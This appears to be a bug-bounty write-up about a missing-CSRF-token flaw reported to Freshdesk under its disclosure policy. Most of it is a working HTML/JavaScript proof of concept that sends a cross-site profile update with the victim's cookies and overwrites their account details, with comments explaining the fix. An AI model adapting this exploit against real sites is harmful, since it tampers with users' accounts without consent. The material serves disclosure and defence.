Rewarded by Freshdesk

I was able to find a few web-application security issues in the Freshdesk website. They had a responsible disclosure policy, so I was able to report them. http://freshdesk.com/security


The application did not use proper CSRF tokens, so an arbitrary user could change the account information of other users.

<!-- Proof of concept for the missing-CSRF-token issue described above.
     Loaded in a browser where the victim is logged in to the target portal,
     pressing the button makes that browser submit a profile update with the
     victim's own session cookie attached. The fix is server-side: require a
     session-bound anti-CSRF token on state-changing requests and/or verify
     the Origin header; SameSite session cookies add defence in depth. -->
<html>

  <body>
    <script>
      // Builds and sends a cross-site multipart POST to the profile endpoint.
      // Nothing in the request body carries a per-session anti-CSRF token;
      // the server accepting the request anyway is the vulnerability.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        // Target endpoint on the author's demo portal (cross-origin from
        // wherever this page is hosted).
        xhr.open("POST", "http://exploit.freshdesk.com/support/profile", true);
        // Accept, Accept-Language and a multipart/form-data Content-Type are
        // CORS-safelisted, so the browser sends this without a preflight even
        // from another origin. The response is not readable, but the
        // server-side state change still happens, so CORS is not a CSRF
        // defence here.
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------273522544628602");
        // Attach the victim's cookies for the target origin; this is what
        // turns a cross-origin POST into a request made "as" the victim.
        // A SameSite=Lax/Strict session cookie would not be sent here.
        xhr.withCredentials = true;
        // Hand-built multipart body mirroring the site's own profile form.
        // No anti-CSRF field (e.g. Rails' authenticity_token) is present.
        var body = "-----------------------------273522544628602\r\n" + 
          // Looks like a Rails-style method override turning the POST into
          // a PUT on the server side — TODO confirm against the real form.
          "Content-Disposition: form-data; name=\"_method\"\r\n" + 
          "\r\n" + 
          "put\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          // Empty avatar upload part, kept so the body matches the form shape.
          "Content-Disposition: form-data; name=\"user[avatar_attributes][content]\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          // Profile fields that get overwritten on the victim's account.
          "Content-Disposition: form-data; name=\"user[name]\"\r\n" + 
          "\r\n" + 
          "haxor\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[job_title]\"\r\n" + 
          "\r\n" + 
          "haxor\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[phone]\"\r\n" + 
          "\r\n" + 
          "12345678904\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[mobile]\"\r\n" + 
          "\r\n" + 
          "7894561233\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[twitter_id]\"\r\n" + 
          "\r\n" + 
          "@exfdsfdsf\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[time_zone]\"\r\n" + 
          "\r\n" + 
          "sesdsds\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"user[language]\"\r\n" + 
          "\r\n" + 
          "en\r\n" + 
          "-----------------------------273522544628602\r\n" + 
          "Content-Disposition: form-data; name=\"commit\"\r\n" + 
          "\r\n" + 
          "Save Changes\r\n" + 
          "-----------------------------273522544628602--\r\n";
        // Copy the string into a byte array one char code at a time and send
        // it as a Blob so the multipart body goes out verbatim. This is only
        // byte-accurate for ASCII, which every field above is.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <!-- Manual trigger: the request is only sent when the button is clicked. -->
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
